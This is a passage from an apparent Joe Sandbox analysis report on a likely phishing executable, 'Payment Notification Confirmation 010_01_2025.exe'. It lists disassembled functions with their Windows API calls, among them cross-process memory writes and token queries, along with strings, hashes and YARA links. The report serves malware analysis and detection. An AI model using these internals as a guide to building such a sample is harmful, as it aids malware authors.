Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 601d563b4f598f97339fe607c894d77989dbf7fea1369ff4212546054a2df22b
Instruction ID: f835c2a4b94a2feba3668ecad8a619a9599b6c0516075d115be0c7f4277d8cfa
Opcode Fuzzy Hash: 601d563b4f598f97339fe607c894d77989dbf7fea1369ff4212546054a2df22b
Instruction Fuzzy Hash: B6015371C19A2DDBCF00EBE9DC59AEDBB78FB08301F050946E902B2241CB349A509BA1

Function 009910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00991114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 00991120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 0099112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00990B9B,?,?,?), ref: 00991136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0099114D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 3f851d337c08c0e0f056081423c2a1dc26aae23519a90bd28a08be77dff1251f
Instruction ID: 706f1b480b671d6b0fa76d39e92cf8647f2960161d495c044c57e63bdffd523b
Opcode Fuzzy Hash: 3f851d337c08c0e0f056081423c2a1dc26aae23519a90bd28a08be77dff1251f
Instruction Fuzzy Hash: AA01F6B5614206BFDB114BA9DC49E6A3F6EEF893A0B244419FA49D6260DB31DC01AB60

Function 00990FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00990FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00990FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00990FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00990FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00991002

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 50d92a5ef5a40e7a86a1a48fc5ae74caac405eafc73d4b17c18a79b6d7673410
Instruction ID: af953a33d1fd8414faf1e2c14f73249be3f5995036a04607091f526f8b18f190
Opcode Fuzzy Hash: 50d92a5ef5a40e7a86a1a48fc5ae74caac405eafc73d4b17c18a79b6d7673410
Instruction Fuzzy Hash: 17F049B5614302ABDB214FA9AC49F563FADFF89762F144414FA49C6261CA71DC40DB60

Function 00991014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0099102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00991036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00991045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0099104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00991062

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 419dcd0707cb0082d74b73fcd85a176a4f4f2a4e60e428ba5d40306e6ed05c65
Instruction ID: 0c815ceed91297dafc26fc6698cf5c71dee0f2d6a1e003fb5cc69d55ad614996
Opcode Fuzzy Hash: 419dcd0707cb0082d74b73fcd85a176a4f4f2a4e60e428ba5d40306e6ed05c65
Instruction Fuzzy Hash: 9CF06DB5614302EBDB215FA9EC59F563FADFF897A1F140414FA49C7250CA71D8409B60

Function 009A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,009A017D,?,009A32FC,?,00000001,00972592,?), ref: 009A0324
CloseHandle.KERNEL32(?,?,?,?,009A017D,?,009A32FC,?,00000001,00972592,?), ref: 009A0331
CloseHandle.KERNEL32(?,?,?,?,009A017D,?,009A32FC,?,00000001,00972592,?), ref: 009A033E
CloseHandle.KERNEL32(?,?,?,?,009A017D,?,009A32FC,?,00000001,00972592,?), ref: 009A034B
CloseHandle.KERNEL32(?,?,?,?,009A017D,?,009A32FC,?,00000001,00972592,?), ref: 009A0358
CloseHandle.KERNEL32(?,?,?,?,009A017D,?,009A32FC,?,00000001,00972592,?), ref: 009A0365

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 914cf6fbf620a129c07a5fb557b22e939af1e900f85a2103b48843834d9651c0
Instruction ID: be09804f7dd44abfb0d8bb41e96badea92994da71631f80ea897170c94572065
Opcode Fuzzy Hash: 914cf6fbf620a129c07a5fb557b22e939af1e900f85a2103b48843834d9651c0
Instruction Fuzzy Hash: DA01AA72800B159FCB30AF66D880812FBF9BFA13153158A3FD19652931CBB1A998DF80

Function 0096D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0096D752

Part of subcall function 009629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000), ref: 009629DE
Part of subcall function 009629C8: GetLastError.KERNEL32(00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000,00000000), ref: 009629F0

_free.LIBCMT ref: 0096D764
_free.LIBCMT ref: 0096D776
_free.LIBCMT ref: 0096D788
_free.LIBCMT ref: 0096D79A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5a91e1c63783b36c2eff252a90e712b63ea5264870a11342d3e214fda79178f4
Instruction ID: 434eff586971569632163f21b1be64215904ab1c5e4f00eeda85d9eadfed0a94
Opcode Fuzzy Hash: 5a91e1c63783b36c2eff252a90e712b63ea5264870a11342d3e214fda79178f4
Instruction Fuzzy Hash: 3BF036B2B55608AB8629EB64FBC5D2677DDBB84750B944C05F058D7501CB30FC80D665

Function 00995C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00995C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00995C6F
MessageBeep.USER32(00000000), ref: 00995C87
KillTimer.USER32(?,0000040A), ref: 00995CA3
EndDialog.USER32(?,00000001), ref: 00995CBD

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5c5cb89f440d2db6b53b3425dd677bf8bad4dc753146e7986cb2d27e7182e71f
Instruction ID: 861e7853052e427ff02f166386e81dce043be966ffedf01fc5927f0c598157d0
Opcode Fuzzy Hash: 5c5cb89f440d2db6b53b3425dd677bf8bad4dc753146e7986cb2d27e7182e71f
Instruction Fuzzy Hash: 0C018170914B04ABFF215B14DF4EFA67BB8BB00B05F010559E687A15E1EBF4A9849F90

Function 009622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009622BE

Part of subcall function 009629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000), ref: 009629DE
Part of subcall function 009629C8: GetLastError.KERNEL32(00000000,?,0096D7D1,00000000,00000000,00000000,00000000,?,0096D7F8,00000000,00000007,00000000,?,0096DBF5,00000000,00000000), ref: 009629F0

_free.LIBCMT ref: 009622D0
_free.LIBCMT ref: 009622E3
_free.LIBCMT ref: 009622F4
_free.LIBCMT ref: 00962305

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: eaecd1b08df5f0b404e483217e516bcc5be383e0cd32af3b5d5af94a55c89ddf
Instruction ID: 020ec2780a166b2b9ad16d1e597e52533535f948be797602260feadba017701f
Opcode Fuzzy Hash: eaecd1b08df5f0b404e483217e516bcc5be383e0cd32af3b5d5af94a55c89ddf
Instruction Fuzzy Hash: 6EF05EB0914A298BC716EFD8BE11E983BA8F7987A1B00451AF410D22B1CB310813FFE5

Function 009495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009495D4
StrokeAndFillPath.GDI32(?,?,009871F7,00000000,?,?,?), ref: 009495F0
SelectObject.GDI32(?,00000000), ref: 00949603
DeleteObject.GDI32 ref: 00949616
StrokePath.GDI32(?), ref: 00949631

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 43f3065de6f86daf2d8b36d47fb7d7f830fc36b8b7fbd93ac0b2026647748ee7
Instruction ID: ba2f6de0027c465e92b2161c2d2856726831546e4f1724aa2f557cb29f48b91d
Opcode Fuzzy Hash: 43f3065de6f86daf2d8b36d47fb7d7f830fc36b8b7fbd93ac0b2026647748ee7
Instruction Fuzzy Hash: 0DF0143140A208EBDB22DFA9ED1CFA53F65AB013A2F548214F869550F0C7308993EF20

Function 00960F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 009610F9
__freea.LIBCMT ref: 00961117

Part of subcall function 00961537: _free.LIBCMT ref: 0096154F

Strings

a/p, xrefs: 009611DE
am/pm, xrefs: 0096117A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 72a6d5f353226cbb6ea2c7bf81fbe122a24a7b02858f51eeb276fd957e1c84ac
Instruction ID: ddbf301533098bca2d12c6ead5b3230117ddf40f0c8eb7be2d6984c1c0ce98d2
Opcode Fuzzy Hash: 72a6d5f353226cbb6ea2c7bf81fbe122a24a7b02858f51eeb276fd957e1c84ac
Instruction Fuzzy Hash: 65D12431904206DBDB289F68C895BFEB7B9FF46300F2C4559E916AB750E3399D80CB91

Function 009B7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00950242: EnterCriticalSection.KERNEL32(00A0070C,00A01884,?,?,0094198B,00A02518,?,?,?,009312F9,00000000), ref: 0095024D
Part of subcall function 00950242: LeaveCriticalSection.KERNEL32(00A0070C,?,0094198B,00A02518,?,?,?,009312F9,00000000), ref: 0095028A

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 009500A3: __onexit.LIBCMT ref: 009500A9

__Init_thread_footer.LIBCMT ref: 009B7BFB

Part of subcall function 009501F8: EnterCriticalSection.KERNEL32(00A0070C,?,?,00948747,00A02514), ref: 00950202
Part of subcall function 009501F8: LeaveCriticalSection.KERNEL32(00A0070C,?,00948747,00A02514), ref: 00950235

Strings

5, xrefs: 009B7C78
Variable must be of type 'Object'., xrefs: 009B7C3A
G, xrefs: 009B7C7F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 768564d13d4f8c4cee3a5c27800b69cbfaa5e1b0c930793914f9ee2305dd2dad
Instruction ID: 3e3d2ba6155fc228050eee130662237bd2b3c0d0eba93b7440a04f2b616a6cdf
Opcode Fuzzy Hash: 768564d13d4f8c4cee3a5c27800b69cbfaa5e1b0c930793914f9ee2305dd2dad
Instruction Fuzzy Hash: CB919B70A04209AFCB14EF94DA91EFDBBB5BFC8310F108549F8469B292DB71AE41CB51

Function 00992716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0099B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009921D0,?,?,00000034,00000800,?,00000034), ref: 0099B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00992760

Part of subcall function 0099B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0099B3F8

Part of subcall function 0099B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0099B355
Part of subcall function 0099B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00992194,00000034,?,?,00001004,00000000,00000000), ref: 0099B365
Part of subcall function 0099B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00992194,00000034,?,?,00001004,00000000,00000000), ref: 0099B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009927CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0099281A

Strings

@, xrefs: 00992832

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b6d34602c893ab36de1e52d537bb7df922a0cd92be5adaa2a00025b6058bbfe6
Instruction ID: 3648db52835a95886da6698859300a846097e607760c5d9e5e028a357df612e6
Opcode Fuzzy Hash: b6d34602c893ab36de1e52d537bb7df922a0cd92be5adaa2a00025b6058bbfe6
Instruction Fuzzy Hash: 53412972900218BEDF10DBA8D942FEEBBB8AF49300F104095EA55B7191DA716E45DBA1

Function 0096172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe,00000104), ref: 00961769
_free.LIBCMT ref: 00961834
_free.LIBCMT ref: 0096183E

Strings

C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe, xrefs: 00961760, 00961767, 00961796, 009617CE

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe
API String ID: 2506810119-3221326368
Opcode ID: 0e83552010071910abfdae1c33ea256ea55ab13c628b1387a092c0905319b747
Instruction ID: 73dadb5d02c16e8a24710ef2aae7996cf353c846db0d2fd570d2690e7131d2e2
Opcode Fuzzy Hash: 0e83552010071910abfdae1c33ea256ea55ab13c628b1387a092c0905319b747
Instruction Fuzzy Hash: A0317EB1A04218AFDB21DF99DC85EDEBBFCEB89350F1841AAF804D7211D6708E41CB90

Function 0099C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0099C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0099C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A01990,01044EA0), ref: 0099C395

Strings

0, xrefs: 0099C2DF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 898c5efcad2bd1bb619dff82c2cb46705c1967c26805d83a7a8dc3614cdcc9cc
Instruction ID: a11e92c8b40c385330507617ecd58debac54078f8f5f80ea8a572f1d6658472b
Opcode Fuzzy Hash: 898c5efcad2bd1bb619dff82c2cb46705c1967c26805d83a7a8dc3614cdcc9cc
Instruction Fuzzy Hash: 8341A3B12083419FDB20DF29DC46F5ABBE8AF85311F148A1DF9A5972D1D770E904CB52

Function 009C4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009CCC08,00000000,?,?,?,?), ref: 009C44AA
GetWindowLongW.USER32 ref: 009C44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009C44D7

Strings

SysTreeView32, xrefs: 009C447C

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2f4bd233e0f78bc3c2eead97ec4a47b2f46f52dfec3a078f4bdfc9dd1970dff5
Instruction ID: c3772c4f772019be3d876b0e20deb3afcb52fa2fd951f7b8e159784994460be4
Opcode Fuzzy Hash: 2f4bd233e0f78bc3c2eead97ec4a47b2f46f52dfec3a078f4bdfc9dd1970dff5
Instruction Fuzzy Hash: 2B31AB71A14605AFDB248F38DC45FEA7BA9EB48334F204719F979921E0D770EC509B50

Function 009B304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,009B3077,?,?), ref: 009B3378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009B307A
_wcslen.LIBCMT ref: 009B309B
htons.WSOCK32(00000000,?,?,00000000), ref: 009B3106

Strings

255.255.255.255, xrefs: 009B3095, 009B309A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: f0a96020a28963db6f9d37a96c57a604cc31876970c0f4aba4238172d039a085
Instruction ID: 1cec906c6afcd63c501cbceb7b500ab8d4ee31c7195d2558d701dae1d9e5a3e9
Opcode Fuzzy Hash: f0a96020a28963db6f9d37a96c57a604cc31876970c0f4aba4238172d039a085
Instruction Fuzzy Hash: FA31D5356042059FC710DF68C685FEA77E8EF54328F64C059E9158B392DB71DE45CB60

Function 009C4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009C4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009C4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009C471A

Strings

msctls_updown32, xrefs: 009C4684

Memory Dump Source

